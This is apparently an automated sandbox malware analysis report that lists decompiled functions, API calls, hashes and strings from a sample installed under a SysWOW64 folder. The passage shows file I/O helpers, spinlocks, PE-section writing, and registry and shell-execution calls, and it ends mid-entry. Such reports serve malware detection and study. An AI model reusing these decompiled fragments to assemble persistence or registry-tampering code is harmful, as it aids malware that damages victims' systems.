                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,?,00000000,00000000), ref: 00E341AB
                                                                                • GetLastError.KERNEL32 ref: 00E341B5
                                                                                • WaitForSingleObject.KERNEL32(?,?), ref: 00E341C6
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00E341D9
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction ID: e773c0339115b822e96994f46ec3d8958a33fc73bb8bdfa24e79fc7d05bb70a9
                                                                                • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction Fuzzy Hash: 7B01A97651250AABDF01DF91ED88BEE7B6CEB18359F104061F901E2090D774AA94CBB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403F18 Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00403F18(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(WriteFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                0x00403f1e
                                                                                0x00403f22
                                                                                0x00403f27
                                                                                0x00403f2b
                                                                                0x00403f2e
                                                                                0x00403f3e
                                                                                0x00403f4c
                                                                                0x00403f7c
                                                                                0x00403f7f
                                                                                0x00403f86
                                                                                0x00000000
                                                                                0x00403f86
                                                                                0x00000000
                                                                                0x00403f83
                                                                                0x00403f59
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403f5f
                                                                                0x00403f7a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403F44
                                                                                • GetLastError.KERNEL32 ref: 00403F4E
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403F5F
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403F72
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedResultSingleWaitWrite
                                                                                • String ID:
                                                                                • API String ID: 3373104450-0
                                                                                • Opcode ID: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction ID: 81d5a9f64dfd66904774ebc82d2e0e48c629fa8216d99cd76bf4a5dbd4e59073
                                                                                • Opcode Fuzzy Hash: 9f1c12f5bce82851f463a843ee7e6df514edb3150162876966f253c0cf19dcdf
                                                                                • Instruction Fuzzy Hash: B9010C7291110AABDF01DF90ED44BEF7B7CEB08356F104066FA01E2190D774DA558BB6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00403F8C Relevance: 6.0, APIs: 4, Instructions: 46filesynchronizationCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00403F8C(void* _a4, void* _a8, long _a12, long _a16, long _a20) {
				struct _OVERLAPPED _v24;
				long _t30;
				void* _t31;

				_v24.Offset = _v24.Offset & 0x00000000;
				_v24.OffsetHigh = _v24.OffsetHigh & 0x00000000;
				_t30 = _a12;
				_t31 = _a16;
				_a16 = _a16 & 0x00000000;
				_v24.hEvent = _t31;
				if(ReadFile(_a4, _a8, _t30,  &_a16,  &_v24) != 0) {
					L3:
					if(_t30 != _a16) {
						L5:
						return 0;
					}
					return 1;
				}
				if(GetLastError() != 0x3e5) {
					goto L5;
				}
				WaitForSingleObject(_t31, _a20);
				if(GetOverlappedResult(_a4,  &_v24,  &_a16, 0) == 0) {
					goto L5;
				}
				goto L3;
			}






                                                                                0x00403f92
                                                                                0x00403f96
                                                                                0x00403f9b
                                                                                0x00403f9f
                                                                                0x00403fa2
                                                                                0x00403fb2
                                                                                0x00403fc0
                                                                                0x00403ff0
                                                                                0x00403ff3
                                                                                0x00403ffa
                                                                                0x00000000
                                                                                0x00403ffa
                                                                                0x00000000
                                                                                0x00403ff7
                                                                                0x00403fcd
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403fd3
                                                                                0x00403fee
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000

                                                                                APIs
                                                                                • ReadFile.KERNEL32(00000000,00000000,0040A3C7,00000000,00000000,000007D0,00000001), ref: 00403FB8
                                                                                • GetLastError.KERNEL32 ref: 00403FC2
                                                                                • WaitForSingleObject.KERNEL32(00000004,?), ref: 00403FD3
                                                                                • GetOverlappedResult.KERNEL32(00000000,00000000,00000000,00000000), ref: 00403FE6
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ErrorFileLastObjectOverlappedReadResultSingleWait
                                                                                • String ID:
                                                                                • API String ID: 888215731-0
                                                                                • Opcode ID: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction ID: 44fd539f7a3468c5635e20a1652967c761b46accf60e77792ab8a53432005efc
                                                                                • Opcode Fuzzy Hash: 7dacf77ebfc6f27f1d23b030b7b6a0e1e1f459510f641919a7ac9d23c17bf39a
                                                                                • Instruction Fuzzy Hash: A601177291110AAFDF01DF90ED45BEF3B7CEF08356F004062F906E2090D7749A549BA6
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3E036 Relevance: 6.0, APIs: 1, Strings: 3, Instructions: 35stringCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • lstrcmp.KERNEL32(?,80000009), ref: 00E3E066
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: lstrcmp
                                                                                • String ID: A$ A$ A
                                                                                • API String ID: 1534048567-1846390581
                                                                                • Opcode ID: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                • Instruction ID: 55cc539650e3c77db28cbe46135054de3d2e6e6061da3a792a71d2ad6b8d9f3d
                                                                                • Opcode Fuzzy Hash: 328de717d7c8de90c20bd47ba6ba1583dee1274120ab1c13f1680d5d51b61bca
                                                                                • Instruction Fuzzy Hash: 5BF06231200702DBCB24CF25D888A92BBE9FB05325F44862AE164E32A0D3B5E898CF51
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A4C7 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E0040A4C7(intOrPtr _a4) {
				long _t3;
				LONG* _t8;
				long _t9;

				_t9 = GetTickCount();
				_t8 = _a4 + 0x5c;
				while(1) {
					_t3 = InterlockedExchange(_t8, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t9;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}






                                                                                0x0040a4dd
                                                                                0x0040a4df
                                                                                0x0040a4f7
                                                                                0x0040a4fa
                                                                                0x0040a4fe
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0040a4e6
                                                                                0x0040a4ed
                                                                                0x0040a4f1
                                                                                0x00000000
                                                                                0x0040a4f1
                                                                                0x00000000
                                                                                0x0040a4ed
                                                                                0x0040a504

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 0040A4D1
                                                                                • GetTickCount.KERNEL32 ref: 0040A4E4
                                                                                • Sleep.KERNEL32(00000000,?,0040C2E9,0040C4E0,00000000,localcfg,?,0040C4E0,00413588,00408810), ref: 0040A4F1
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 0040A4FA
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                • Instruction ID: a5473328a7e7118e9aede6741b06156156ec1e7733dd8d1ec56465b12724d56e
                                                                                • Opcode Fuzzy Hash: 4cd0520482080c365333fb8aab0c55e365768e1349ae612301bcb729eb943e51
                                                                                • Instruction Fuzzy Hash: 7DE0863720131567C6005BA5BD84FAA7B98AB4D761F164072FB08E3280D6AAA99145BF
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404E92 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404E92(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 4;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x2710) {
						Sleep(0xa);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                0x00404e9c
                                                                                0x00404ea6
                                                                                0x00404ea8
                                                                                0x00404ec0
                                                                                0x00404ec3
                                                                                0x00404ec7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404eaf
                                                                                0x00404eb6
                                                                                0x00404eba
                                                                                0x00000000
                                                                                0x00404eba
                                                                                0x00000000
                                                                                0x00404eb6
                                                                                0x00404ecd

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00404E9E
                                                                                • GetTickCount.KERNEL32 ref: 00404EAD
                                                                                • Sleep.KERNEL32(0000000A,?,00000001), ref: 00404EBA
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00404EC3
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                • Instruction ID: 0be737a4b1ecb403dd0b6a084e6b0260aeafc6613011e157a8d43e60cd200510
                                                                                • Opcode Fuzzy Hash: 574f7709b1251d8d4516fda0e718bcbaf1509578ef326d685951742d25275ed5
                                                                                • Instruction Fuzzy Hash: 6AE086B620121457D61027B9FD84F966A89AB9A361F010532F70DE21C0C6AA989345FD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00404BD1 Relevance: 6.0, APIs: 4, Instructions: 27sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E00404BD1(void* __ecx) {
				long _t2;
				void* _t7;
				LONG* _t8;
				long _t9;

				_t7 = __ecx;
				_t9 = GetTickCount();
				_t8 = _t7 + 0xc;
				while(1) {
					_t2 = InterlockedExchange(_t8, 1);
					if(_t2 == 0) {
						break;
					}
					_t2 = GetTickCount() - _t9;
					if(_t2 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t2;
			}







                                                                                0x00404bdb
                                                                                0x00404be5
                                                                                0x00404be7
                                                                                0x00404bff
                                                                                0x00404c02
                                                                                0x00404c06
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00404bee
                                                                                0x00404bf5
                                                                                0x00404bf9
                                                                                0x00000000
                                                                                0x00404bf9
                                                                                0x00000000
                                                                                0x00404bf5
                                                                                0x00404c0c

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00404BDD
                                                                                • GetTickCount.KERNEL32 ref: 00404BEC
                                                                                • Sleep.KERNEL32(00000000,?,?,?,00000004,004050F2), ref: 00404BF9
                                                                                • InterlockedExchange.KERNEL32(-00000008,00000001), ref: 00404C02
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                • Instruction ID: c27c4130c4fb343c81443d6f5f76baf76a02980c1ff66e5fdc0d00212ab38f61
                                                                                • Opcode Fuzzy Hash: 1ad869c4a91a2c80201434bef060b196597965ff38d45849583c02ff4b747b44
                                                                                • Instruction Fuzzy Hash: FCE0867624521457D61027A66D80FA67BA89B99361F064073F70CE2190C9AAE48141BD
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004030FA Relevance: 6.0, APIs: 4, Instructions: 23sleepCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004030FA(LONG* _a4) {
				long _t3;
				long _t5;

				_t5 = GetTickCount();
				while(1) {
					_t3 = InterlockedExchange(_a4, 1);
					if(_t3 == 0) {
						break;
					}
					_t3 = GetTickCount() - _t5;
					if(_t3 < 0x1388) {
						Sleep(0);
						continue;
					}
					break;
				}
				return _t3;
			}





                                                                                0x0040310b
                                                                                0x00403122
                                                                                0x00403128
                                                                                0x0040312c
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00403111
                                                                                0x00403118
                                                                                0x0040311c
                                                                                0x00000000
                                                                                0x0040311c
                                                                                0x00000000
                                                                                0x00403118
                                                                                0x00403131

                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00403103
                                                                                • GetTickCount.KERNEL32 ref: 0040310F
                                                                                • Sleep.KERNEL32(00000000), ref: 0040311C
                                                                                • InterlockedExchange.KERNEL32(?,00000001), ref: 00403128
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CountTick$ExchangeInterlockedSleep
                                                                                • String ID:
                                                                                • API String ID: 2207858713-0
                                                                                • Opcode ID: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                • Instruction ID: 9edc608f4d32da9f9de986fa19dd3c9deb40157c310ade5cfb00ff6fe32d5b40
                                                                                • Opcode Fuzzy Hash: 5475aadbbb6481cfb66701b566d3724b8cf1f0baef2ba10e865a3ab4c750e63b
                                                                                • Instruction Fuzzy Hash: 51E0C235200215ABDB00AF75BD44B8A6E9EDF8C762F014432F205EA1E0C9F44D51897A
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3E3DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 148fileCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • WriteFile.KERNEL32(00000001,D,00000000,00000000,00000000), ref: 00E3E470
                                                                                • CloseHandle.KERNEL32(00000001,00000003), ref: 00E3E484
                                                                                  • Part of subcall function 00E3E2FC: RegCreateKeyExA.ADVAPI32(80000001,00E3E50A,00000000,00000000,00000000,00020106,00000000,00E3E50A,00000000,000000E4), ref: 00E3E319
                                                                                  • Part of subcall function 00E3E2FC: RegSetValueExA.ADVAPI32(00E3E50A,?,00000000,00000003,80000001,000FF000,?,?,?,?,000000C8,004122F8), ref: 00E3E38E
                                                                                  • Part of subcall function 00E3E2FC: RegDeleteValueA.ADVAPI32(00E3E50A,?,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,D), ref: 00E3E3BF
                                                                                  • Part of subcall function 00E3E2FC: RegCloseKey.ADVAPI32(00E3E50A,?,?,?,?,000000C8,004122F8,?,?,?,?,?,?,?,D,00E3E50A), ref: 00E3E3C8
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseValue$CreateDeleteFileHandleWrite
                                                                                • String ID: D
                                                                                • API String ID: 4151426672-185221428
                                                                                • Opcode ID: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                • Instruction ID: fdb1ed0cd741c5365b20823e30b6ad3aff76be11d3569c0aae0fc3c442738e5b
                                                                                • Opcode Fuzzy Hash: f9347908c3accb151d66d4a2045a2710535659ff764f1ec32379916764927f64
                                                                                • Instruction Fuzzy Hash: 3A41C971D00214BAEB206B558C4EFEB3F6CEF04728F149025FA19B42D2E7B58A50DAB5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E38330 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 146registryCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000101,?), ref: 00E383C6
                                                                                • RegCloseKey.ADVAPI32(?,?,?,00000000,00000101,?), ref: 00E38477
                                                                                  • Part of subcall function 00E369C3: SetFileAttributesA.KERNEL32(?,00000080), ref: 00E369E5
                                                                                  • Part of subcall function 00E369C3: SetFileAttributesA.KERNEL32(?,00000002), ref: 00E36A26
                                                                                  • Part of subcall function 00E369C3: GetFileSize.KERNEL32(000000FF,00000000), ref: 00E36A3A
                                                                                  • Part of subcall function 00E3EE95: GetProcessHeap.KERNEL32(00000000,?,00000000,00E31DCF,?), ref: 00E3EEA8
                                                                                  • Part of subcall function 00E3EE95: HeapFree.KERNEL32(00000000), ref: 00E3EEAF
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: File$AttributesHeap$CloseFreeOpenProcessSize
                                                                                • String ID: C:\Windows\SysWOW64\htdzdeug\qbxctmyn.exe
                                                                                • API String ID: 359188348-2070294517
                                                                                • Opcode ID: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                • Instruction ID: 3c9b9d6baa86c03e18f2d7425dbf78ad336ab399fce78202157b173c68648aa5
                                                                                • Opcode Fuzzy Hash: c1a48b1ac5137ef9544f8785227e3e3eae959810ca81eb1dd85f310690abdf03
                                                                                • Instruction Fuzzy Hash: 774190B2800209BEEB10ABA09E89DFF7FBCEB04304F045466F554F2551FAB15A84CB64
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3AFF0 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 121timeCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetLocalTime.KERNEL32(?), ref: 00E3AFFF
                                                                                • SystemTimeToFileTime.KERNEL32(?,?), ref: 00E3B00D
                                                                                  • Part of subcall function 00E3AF6F: gethostname.WS2_32(?,00000080), ref: 00E3AF83
                                                                                  • Part of subcall function 00E3AF6F: lstrcpy.KERNEL32(?,00410B90), ref: 00E3AFE6
                                                                                  • Part of subcall function 00E3331C: gethostname.WS2_32(?,00000080), ref: 00E3333F
                                                                                  • Part of subcall function 00E3331C: gethostbyname.WS2_32(?), ref: 00E33349
                                                                                  • Part of subcall function 00E3AA0A: inet_ntoa.WS2_32(00000000), ref: 00E3AA10
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Time$gethostname$FileLocalSystemgethostbynameinet_ntoalstrcpy
                                                                                • String ID: %OUTLOOK_BND_
                                                                                • API String ID: 1981676241-3684217054
                                                                                • Opcode ID: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                • Instruction ID: 93b8d904a295f1cf94f29f39ec600390bad415bbe38ab64af9a143b19210c0ee
                                                                                • Opcode Fuzzy Hash: 8e8a8b671ed14d1768aa81df58b4956713f73d3ffbf43b844f6b98d3c95244e6
                                                                                • Instruction Fuzzy Hash: E141127290420CABDB25EFA4DC4AEEF3BACFF44304F144426F925A2152EA75D654CF54
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E39452 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 119sleepCOMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ShellExecuteA.SHELL32(00000000,00000000,00000020,00000022,00000000,00000000), ref: 00E39536
                                                                                • Sleep.KERNEL32(000001F4), ref: 00E3955D
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310875987.0000000000E30000.00000040.00001000.00020000.00000000.sdmp, Offset: 00E30000, based on PE: false
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_e30000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ExecuteShellSleep
                                                                                • String ID:
                                                                                • API String ID: 4194306370-3916222277
                                                                                • Opcode ID: 8ec43b0dbd72852d903c080b258003cf27e186f124a7becd1b7b46641cf4f594
                                                                                • Instruction ID: e1271d6d7dce32008ad668d4598b2aea50882290bb00b4aeec3750b8cd353418
                                                                                • Opcode Fuzzy Hash: 8ec43b0dbd72852d903c080b258003cf27e186f124a7becd1b7b46641cf4f594
                                                                                • Instruction Fuzzy Hash: 7E41E4719082847EEB379A68D88D7E63FE49B02318F1461E5D492B7193D7F44DC1C721
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00406987 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 92fileCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 97%
                                                                                			E00406987(void* __ecx, void* _a4, void* _a8, intOrPtr _a12, signed int _a16) {
				long _v8;
				long _v12;
				signed int _t50;
				signed int _t53;
				int _t59;
				signed int _t60;
				long _t68;
				signed int _t74;
				void* _t78;
				void* _t85;

				_t78 = _a8;
				_t48 =  *((intOrPtr*)(_t78 + 0x3c)) + _t78;
				_t7 =  &_a16; // 0x406b2c
				_t85 = (( *( *((intOrPtr*)(_t78 + 0x3c)) + _t78 + 6) & 0x0000ffff) - 1) * 0x28 + ( *(_t48 + 0x14) & 0x0000ffff) + _t48 + 0x18;
				_t68 =  *(_t85 + 0x14);
				_t50 =  *_t7 - _t68;
				_v8 = _t50;
				if(_t68 >= _a12) {
					L5:
					_a16 = _a16 & 0x00000000;
				} else {
					_t74 =  *(_t85 + 0x10);
					if(_t74 == 0) {
						goto L5;
					} else {
						_v12 = _t74;
						_a16 = _t50 / _t74;
						if(_a16 < 1) {
							_a16 = 1;
						}
						_t20 =  &_a16; // 0x406b2c
						 *(_t85 + 0x10) =  *_t20 * _t74;
					}
				}
				_v8 = _v8 & 0x00000000;
				if(WriteFile(_a4, _t78, _t68,  &_v8, 0) == 0 || _v8 != _t68) {
					if(_a16 != 0) {
						 *(_t85 + 0x10) = _v12;
					}
					_t53 = 0;
				} else {
					if(_a16 == 0) {
						L13:
						_t53 = _t68;
					} else {
						 *(_t85 + 0x10) = _v12;
						while(1) {
							_v8 = _v8 & 0x00000000;
							_t59 = WriteFile(_a4, _a8 +  *(_t85 + 0x14), _v12,  &_v8, 0);
							_t60 = _v8;
							if(_t59 == 0 || _t60 != _v12) {
								break;
							}
							_t68 = _t68 + _t60;
							_t41 =  &_a16;
							 *_t41 = _a16 - 1;
							if( *_t41 != 0) {
								continue;
							} else {
								goto L13;
							}
							goto L18;
						}
						asm("sbb eax, eax");
						_t53 =  !_t60 & _t68 + _t60;
					}
				}
				L18:
				return _t53;
			}













                                                                                0x0040698f
                                                                                0x00406995
                                                                                0x004069a7
                                                                                0x004069aa
                                                                                0x004069ac
                                                                                0x004069af
                                                                                0x004069b1
                                                                                0x004069b7
                                                                                0x004069e0
                                                                                0x004069e0
                                                                                0x004069b9
                                                                                0x004069b9
                                                                                0x004069be
                                                                                0x00000000
                                                                                0x004069c0
                                                                                0x004069c4
                                                                                0x004069c7
                                                                                0x004069d0
                                                                                0x004069d2
                                                                                0x004069d2
                                                                                0x004069d5
                                                                                0x004069db
                                                                                0x004069db
                                                                                0x004069be
                                                                                0x004069e4
                                                                                0x004069fd
                                                                                0x00406a51
                                                                                0x00406a56
                                                                                0x00406a56
                                                                                0x00406a59
                                                                                0x00406a04
                                                                                0x00406a08
                                                                                0x00406a3c
                                                                                0x00406a3c
                                                                                0x00406a0a
                                                                                0x00406a0d
                                                                                0x00406a10
                                                                                0x00406a10
                                                                                0x00406a27
                                                                                0x00406a2b
                                                                                0x00406a2e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406a35
                                                                                0x00406a37
                                                                                0x00406a37
                                                                                0x00406a3a
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00406a3a
                                                                                0x00406a45
                                                                                0x00406a49
                                                                                0x00406a49
                                                                                0x00406a08
                                                                                0x00406a5b
                                                                                0x00406a5f

                                                                                APIs
                                                                                • WriteFile.KERNEL32(00409A60,?,?,00000000,00000000,00409A60,?,00000000), ref: 004069F9
                                                                                • WriteFile.KERNEL32(00409A60,?,00409A60,00000000,00000000), ref: 00406A27
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000011.00000002.310301101.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_17_2_400000_qbxctmyn.jbxd
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: FileWrite
                                                                                • String ID: ,k@
                                                                                • API String ID: 3934441357-1053005162
                                                                                • Opcode ID: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                • Instruction ID: 2e4882fff751b5905bcc38bfa2cd4d67bf9c642b42fdf425c00f27fbfd993b21
                                                                                • Opcode Fuzzy Hash: e4aff9389b963f63373f6495f6f2d31144d691977fa3f05a849364ed3536fcbf
                                                                                • Instruction Fuzzy Hash: 3A313A72A00209EFDB24DF58D984BAA77F4EB44315F12847AE802F7680D374EE64CB65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00E3BC7A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 88COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • GetTickCount.KERNEL32 ref: 00E3B9D9
                                                                                • InterlockedIncrement.KERNEL32(00413648), ref: 00E3BA3A
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00E3BA94
                                                                                • GetTickCount.KERNEL32 ref: 00E3BB79
                                                                                • GetTickCount.KERNEL32 ref: 00E3BB99
                                                                                • InterlockedIncrement.KERNEL32(?), ref: 00E3BE15
                                                                                • closesocket.WS2_32(00000000), ref: 00E3BEB4
                                                                                Strings
                                                                                Memory Dump Source
